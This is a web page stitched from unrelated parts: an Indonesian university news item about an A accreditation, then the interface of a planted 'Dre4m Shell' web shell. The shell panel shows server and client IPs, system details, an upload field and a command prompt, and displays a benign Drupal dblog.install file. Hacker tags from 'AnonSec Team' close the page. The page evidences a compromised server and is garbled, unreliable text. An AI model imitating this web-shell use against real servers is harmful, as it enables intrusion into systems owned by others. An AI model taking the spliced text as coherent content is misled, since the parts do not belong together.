Sesuai dengan Surat Keputusan Badan Akreditasi Nasional Perguruan Tinggi (BAN-PT) Nomor 1151/SK/BAN-PT/Akred/S/Xl/2015, prodi Teknologi Pendidikan FIP UNY memperoleh nilai Akreditasi A (skor 367). Hasil ini tentu saja sangat membanggakan karena sebelumnya prodi TP berakreditasi B. Perlu diketahui bahwa rangkaian akreditasi ini membutuhkan tenaga serta pikiran, dari awal penyusunan borang sampai dengan visitasi. Oleh karena itu Ketua Jurusan KTP Dr. Sugeng Bayu Wahyono, M.Si. atas nama Jurusan mengucapkan terimakasih kepada semua pihak yang telah membantu dan mendukung proses akreditasi, baik Jajaran Dekanat FIP, Bapak Ibu Kasubag, dosen, karyawan, serta para alumni dan mahasiswa.

Akreditasi Program Studi yang dilakukan oleh  BAN-PT dalam rangka mengevaluasi dan menilai, serta menetapkan status dan  peringkat mutu program studi berdasarkan standard mutu yang telah ditetapkan. Akreditasi merupakan syarat mutlak yang harus dipenuhi oleh setiap Prodi agar dapat menjadi tolok ukur di dalam memberikan pelayanan pendidikan yang lebih bermutu kepada masyarakat.

Jurusan KTP FIP UNY akan berkomitmen untuk mempertahankan peringkat akreditasi ini, dengan upaya menjaga dan meningkatkan kualitas pelayanan kepada mahasiswa, masyarakat, serta stakeholder. /jz

Dre4m Was Here
Dre4m Shell
Server IP : 10.11.12.9  /  Your IP : 18.191.163.224
Web Server : nginx/1.27.3
System : Linux 610f24998324 6.1.0-23-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.99-1 (2024-07-15) x86_64
User : www-data ( 1004)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /public_html/modules/dblog/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /public_html/modules/dblog/dblog.install
<?php

/**
 * @file
 * Install, update and uninstall functions for the dblog module.
 */

/**
 * Implements hook_schema().
 */
function dblog_schema() {
  $schema['watchdog'] = array(
    'description' => 'Table that contains logs of all system events.',
    'fields' => array(
      'wid' => array(
        'type' => 'serial',
        'not null' => TRUE,
        'description' => 'Primary Key: Unique watchdog event ID.',
      ),
      'uid' => array(
        'type' => 'int',
        'not null' => TRUE,
        'default' => 0,
        'description' => 'The {users}.uid of the user who triggered the event.',
      ),
      'type' => array(
        'type' => 'varchar',
        'length' => 64,
        'not null' => TRUE,
        'default' => '',
        'description' => 'Type of log message, for example "user" or "page not found."',
      ),
      'message' => array(
        'type' => 'text',
        'not null' => TRUE,
        'size' => 'big',
        'description' => 'Text of log message to be passed into the t() function.',
      ),
      'variables' => array(
        'type' => 'blob',
        'not null' => TRUE,
        'size' => 'big',
        'description' => 'Serialized array of variables that match the message string and that is passed into the t() function.',
      ),
      'severity' => array(
        'type' => 'int',
        'unsigned' => TRUE,
        'not null' => TRUE,
        'default' => 0,
        'size' => 'tiny',
        'description' => 'The severity level of the event; ranges from 0 (Emergency) to 7 (Debug)',
      ),
      'link' => array(
        'type' => 'varchar',
        'length' => 255,
        'not null' => FALSE,
        'default' => '',
        'description' => 'Link to view the result of the event.',
      ),
      'location'  => array(
        'type' => 'text',
        'not null' => TRUE,
        'description' => 'URL of the origin of the event.',
      ),
      'referer' => array(
        'type' => 'text',
        'not null' => FALSE,
        'description' => 'URL of referring page.',
      ),
      'hostname' => array(
        'type' => 'varchar',
        'length' => 128,
        'not null' => TRUE,
        'default' => '',
        'description' => 'Hostname of the user who triggered the event.',
      ),
      'timestamp' => array(
        'type' => 'int',
        'not null' => TRUE,
        'default' => 0,
        'description' => 'Unix timestamp of when event occurred.',
      ),
    ),
    'primary key' => array('wid'),
    'indexes' => array(
      'type' => array('type'),
      'uid' => array('uid'),
      'severity' => array('severity'),
    ),
  );

  return $schema;
}

/**
 * Implements hook_uninstall().
 */
function dblog_uninstall() {
  variable_del('dblog_row_limit');
}

/**
 * @addtogroup updates-6.x-to-7.x
 * @{
 */

/**
 * Update the {watchdog} table.
 */
function dblog_update_7001() {
  // Allow NULL values for links.
  db_change_field('watchdog', 'link', 'link', array(
    'type' => 'varchar',
    'length' => 255,
    'not null' => FALSE,
    'default' => '',
    'description' => 'Link to view the result of the event.',
  ));

  // Add an index on uid.
  db_add_index('watchdog', 'uid', array('uid'));

  // Allow longer type values.
  db_change_field('watchdog', 'type', 'type', array(
    'type' => 'varchar',
    'length' => 64,
    'not null' => TRUE,
    'default' => '',
    'description' => 'Type of log message, for example "user" or "page not found."',
  ));

  // Convert the variables field (that stores serialized variables) from text to blob.
  db_change_field('watchdog', 'variables', 'variables', array(
    'type' => 'blob',
    'not null' => TRUE,
    'size' => 'big',
    'description' => 'Serialized array of variables that match the message string and that is passed into the t() function.',
  ));
}

/**
 * @} End of "addtogroup updates-6.x-to-7.x".
 */

/**
 * @addtogroup updates-7.x-extra
 * @{
 */

/**
 * Add an index to the severity column in the watchdog database table.
 */
function dblog_update_7002() {
  db_add_index('watchdog', 'severity', array('severity'));
}

/**
 * Account for possible legacy systems where dblog was not installed.
 */
function dblog_update_7003() {
  if (!db_table_exists('watchdog')) {
    db_create_table('watchdog', drupal_get_schema_unprocessed('dblog', 'watchdog'));
  }
}

/**
 * @} End of "addtogroup updates-7.x-extra".
 */

Anon7 - 2022
AnonSec Team